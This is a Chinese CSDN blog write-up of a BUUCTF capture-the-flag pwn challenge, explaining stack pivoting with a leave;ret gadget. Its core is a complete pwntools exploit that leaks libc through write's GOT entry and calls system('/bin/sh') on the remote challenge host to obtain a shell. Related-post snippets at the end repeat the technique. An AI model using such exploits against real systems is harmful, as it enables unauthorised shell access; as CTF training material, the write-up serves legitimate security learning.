Black_Watch_入群题_PWN

最新推荐文章于 2023-08-01 20:38:25 发布
最新推荐文章于 2023-08-01 20:38:25 发布
阅读量1.2k 收藏
点赞数
分类专栏: buuctf 题目 文章标签: linux 安全 运维 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/121826589
版权

Black_Watch_入群题_PWN

查看保护
请添加图片描述
请添加图片描述
有溢出,长度不够,又有s可以存放payload。所以栈迁移
用ebp和esp这两个跳板,控制eip顺利执行需要的payload。
leave_ret(mov esp, ebp; pop ebp;)用这个gadgets。

from pwn import *

context(arch='i386', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 28574)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = elf.sym['main']
write_plt = elf.plt['write']
write_got = elf.got['write']

r.recvuntil('What is your name?')
p1 = p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
r.send(p1)

leave_ret = 0x08048408
s_addr = 0x804A300
r.recvuntil('What do you want to say?')
p2 = b'a' * 0x18 + p32(s_addr - 4) + p32(leave_ret)
r.send(p2)

write_addr = u32(r.recv(4))

libc = ELF('libc-2.23.so')
libc_base = write_addr - libc.sym['write']

system_addr =  libc_base + libc.sym['system']
bin_sh = libc_base + libc.search(b'/bin/sh').__next__()

p3 = p32(system_addr) + p32(0) + p32(bin_sh)
r.recvuntil('What is your name?')
r.sendline(p3)
r.recvuntil('What do you want to say?')
r.sendline(p2)

r.interactive()
z1r0.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 6
    评论
专栏目录
PWN 栈迁移门解说 [Black Watch 群题]PWN
weixin_45441024的博客
11-30 609
PWN之栈迁移解说 适用情况: 1.栈溢出的长度不足以让我们把ROP写进去 2.程序开启了栈的不可执行保护 基础知识: 我们栈迁移的目的就是将我们在栈上不可执行的链子转移到data段或者bss段上面 ,这里就需要用到leave;ret了,在这一类的题型中我们是构造并使用两次leave,来将ebp转移到我们构造的后门的起始位置。 寻找leave;ret需要用到ROPgadget这个工具 $ ROPgadget --binary '/home/pwn/Desktop/bbys_tu_2016' --only
BUUCTF-[Black Watch 群题]PWN
Fzuim的博客
04-14 366
常规检查下来,发现可以进行栈溢出,但是允许操作的空间只有8个字节… 看下ida伪代码 可操作空间很小,只能覆盖到eip,正常思路是:泄露write的got表地址,然后通过libcsearch找出system和bin/sh的地址,再次构造栈溢出攻击。此题目栈溢出只能操作8字节,一般思路行不通。此时就用到另一个概念:栈迁移!!! 栈迁移的关键点在于esp,能把esp重新指向另外一块内存空间,即可成功。这题的另一块内存空间就是bss段。 利用到栈迁移,我们需要在原本栈的eip位置覆盖成 leave;r.
[Black Watch 群题]PWN
m0sway的博客
11-24 1345
[Black Watch 群题]PWN 使用checksec查看: 只开启了栈不可执行,拉进IDA中查看: 直接给了漏洞函数,跟进看: 变量s里面可写0x200个字符,放在bss段中。变量buf里面可写0x20个字符,但是并不能溢出。 可以联想到栈迁移的方法,将栈迁移到变量s所在的bss段中,s里面放上payload 这题没有system和/bin/sh,需要先进行libc泄露再getshell exp: from pwn import * #start r = remote("node4.b
【BUUCTF】[Black Watch 群题]PWN
m0_51251108的博客
12-27 385
【BUUCTF】[Black Watch 群题]PWN 记录下刷题,方便自己以后回顾,写的很烂,还请见谅 本题要用栈迁移 先checksec,file和nc看下程序 32位,动态链接,无canary和pie 思路:vul_function()里最后的read能栈溢出,但位置太短,不够写rop,运用栈迁移跳转至跳转至上一个read,写rop链,ret2libc后就能拿到shell了 主要是如何栈迁移: leave ret相当于: leave => mov esp, ebp; pop ebp
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
ARM7下PWN接口的使用源码,包含C语言及汇编
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
0998_samp_gta_PWN_
10-02
samp开服的一个pwn 是地图的 一个酒吧
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
[Black Watch 群题]PWN(栈迁移)
qq_39869547的博客
02-06 947
栈迁移主要解决溢出空间不足的问题, 前提条件知道欲迁移位置的地址。 from LibcSearcher import * from PwnContext.core import * binary = './spwn' debug_libc = './libc-2.23.so' elf = ELF(binary) libc = ELF(debug_libc) local = 1 if local ...
BUUCTF:[Black Watch 群题]PWN(write up)
qq_44768749的博客
08-23 788
BUUCTF:[Black Watch 群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
[BUUCTF]PWN——[Black Watch 群题]PWN
mcmuyanga的博客
10-26 2427
[Black Watch 群题]PWN——栈劫持 群题密码在 /password.txt Ubuntu 16 2020年02月27日:此群题已作废,请看新版群题。 附件 解题步骤: 例行检查,32位程序,开启了nx保护 运行一下程序,两次输,测试时发现输长度过长,会报错 32位ida载,首先shift+f12查看一下程序里的字符串,没有system函数和‘/bin/sh’的字符串,这边需要我们自己去想办法构造system(‘/bin/sh’) 从main函数开始看程序
buuctf [Black Watch 群题]PWN
qq_42728977的博客
04-10 636
本来想着栈溢出简简单单,然后发现竟然没见过这知识点,堆迁移。 看雪链接
PWN · 栈迁移】[BUUCTF][Black Watch 群题]PWN
Mr_Fmnwon的博客
08-01 357
进能够覆盖ebp和ret,很难不往栈迁移上想。 修改ebp和ret后我们可以将栈指针指向另一处地址addr,需要ebp修改为ebp-4和ret修改为leave;ret地址。这是触发栈迁移的基本过程。 查看整个代码发现没有后门函数。 2.泄露libc 没有system函数的使用,但是有write函数。我们可以通过write泄露write的真实地址,从而泄露libc的地址。进一步可以拿到system和str_bin_sh的地址。 3.组合流程① read大量数据,可以是 aaaa + write.pl
[Black Watch 群题]PWN-栈迁移
个人笔记
04-20 347
细节详情参考:https://blog.csdn.net/mcmuyanga/article/details/109260008。buf溢出栈空间只有0x20-0x18=8字节无法构造rop,所以需要利用栈迁移技术,迁移到bss上构造rop。bss栈布局:(左边是第一泄露Libc构造栈帧,右边是第二次重写获取shell的栈帧)改变思路:由于此程序没有可直接ret利用的函数同时溢出空间很小,所以需要。栈迁移操作:构造好栈中ebp新位置。思路:ret2shellcode。栈迁移关键指令:leave。
[Black Watch 群题]PWN 栈劫持的利用
半岛铁盒的博客
08-17 322
32位程序,开启了nx保护 没有system函数和‘/bin/sh’的字符串,这边需要我们自己去想办法构造system(‘/bin/sh’) 思路 第一次输的参数s,那边我们可以写很长的数据,我们可以将我们的rop链布置在那里, 接着执行第二次输,利用站劫持,把程序的执行流程劫持到第一次输的位置就可以了 站劫持利用 做栈劫持主要用到的是一个leave;ret指令,一般程序执行完成后都会调用leave;ret来还原现场 payload1=‘a’*0x18+p32(s-4)+p32(leave_r
[Black Watch 群题]PWN之栈迁移
wuyvle的博客
02-22 197
进去康康函数结构 第二个read函数可以溢出但是可以构造的rop链很短 0x20-0x18 不过可以用第一个read构造ROP链,且刚好在bss段中,之后栈迁移到该地址执行,后面就是常规的泄露libc来getshell 栈迁移 首先来介绍一下栈迁移是什么? 以32位程序举例,在使用call这个命令,进一个函数的时候,程序会进行一系列栈操作: push eip+4; push ebp; mov ebp,esp; 这些操作是用来保护现场,避免执行完函数后堆栈不平衡以及找不到之前的口地址。 执行完函数后.
群题
doudoudedi
01-29 725
不好讲就是群题 exp: #! /usr/bin/python2 from pwn import * from LibcSearcher import * local=0 if local==1: p=process('../binary/spwn') elf=ELF('../binary/spwn') libc=elf.libc else: p=remote('node3.buuoj....
xdctf2015_pwn200
最新发布
09-03
xdctf2015_pwn200是一道CTF比赛中的题目,是一个二进制漏洞利用题目。从代码中可以看出,它利用了一个栈溢出漏洞来实现攻击。在攻击过程中,首先使用write函数的got地址来泄露出libc中write函数的真实地址,然后通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值